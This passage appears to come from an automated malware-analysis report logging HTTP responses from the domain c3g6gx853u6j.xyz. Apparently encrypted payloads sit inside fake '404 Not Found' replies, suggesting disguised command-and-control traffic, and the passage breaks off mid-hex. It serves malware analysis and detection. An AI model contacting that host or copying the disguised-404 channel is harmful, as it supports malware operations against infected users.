    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:05:52 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 81Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e8 87 b6 b8 e7 4f 1a f2 d8 24 e1 fc 14 36 94 a4 8f fb 6e b5 84 82 be 7f f0 74 cc b6 5f 33 86 22 07 8d 1e 34 b4 95 8a 43 d5 a9 1c c6 c2 93 b0 6f fe 44 0e e0 c5 e2 e4 fa c6 70 a1 55 db Data Ascii: %S`Nh&WQY^O$6nt_3"4CoDpU
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:05:53 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 74Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ec 8a ac fd a3 18 07 bf df 26 ba ea 0f 3f 85 ef 94 ff 20 f1 b0 82 b9 79 a4 51 b6 aa 04 70 d0 3c 43 8f 5c 29 bd c0 ce 1c cc cf 5c 95 94 c5 d4 3a ba 18 78 ff ce f0 Data Ascii: %S`Nh&WQY^&? yQp<C\)\:x
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:05:54 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 63 33 67 36 67 78 38 35 33 75 36 6a 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at c3g6gx853u6j.xyz Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:05:54 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 63 33 67 36 67 78 38 35 33 75 36 6a 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at c3g6gx853u6j.xyz Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:05:55 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 50Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ff 91 b9 fb a5 1c 4c ae 9e 38 fd b5 1a 3f 85 a5 9f c2 29 99 a1 c8 f3 6c b1 53 d0 aa 10 79 Data Ascii: %S`Nh&WQY^L8?)lSy
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:05:58 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 63 33 67 36 67 78 38 35 33 75 36 6a 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at c3g6gx853u6j.xyz Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:06:00 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 69Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ec 8a ac fd a3 18 07 bf df 26 ba d0 1c 2a 9e e3 d7 a5 70 f1 81 8a bd 77 a0 59 9a e0 0a 70 d0 71 1e 83 4a 6f be 8e d3 47 8e eb 1f 8a 98 85 e1 23 ad Data Ascii: %S`Nh&WQY^&*pwYpqJoG#
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:06:01 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 63 33 67 36 67 78 38 35 33 75 36 6a 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at c3g6gx853u6j.xyz Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:06:01 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 63 33 67 36 67 78 38 35 33 75 36 6a 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at c3g6gx853u6j.xyz Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:06:02 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 63 33 67 36 67 78 38 35 33 75 36 6a 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at c3g6gx853u6j.xyz Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:06:02 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 63 33 67 36 67 78 38 35 33 75 36 6a 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at c3g6gx853u6j.xyz Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:06:02 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 63 33 67 36 67 78 38 35 33 75 36 6a 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at c3g6gx853u6j.xyz Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:06:03 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 63 33 67 36 67 78 38 35 33 75 36 6a 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at c3g6gx853u6j.xyz Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:06:03 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 63 33 67 36 67 78 38 35 33 75 36 6a 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at c3g6gx853u6j.xyz Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:06:03 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 52Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ff 91 b9 fb a5 1c 4c ae 9e 38 fd b5 48 02 80 cc 9f f7 6e bc 92 91 a6 64 ad 5b c6 f9 46 79 c7 76 Data Ascii: %S`Nh&WQY^L8Hnd[Fyv
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:06:05 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 63 33 67 36 67 78 38 35 33 75 36 6a 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 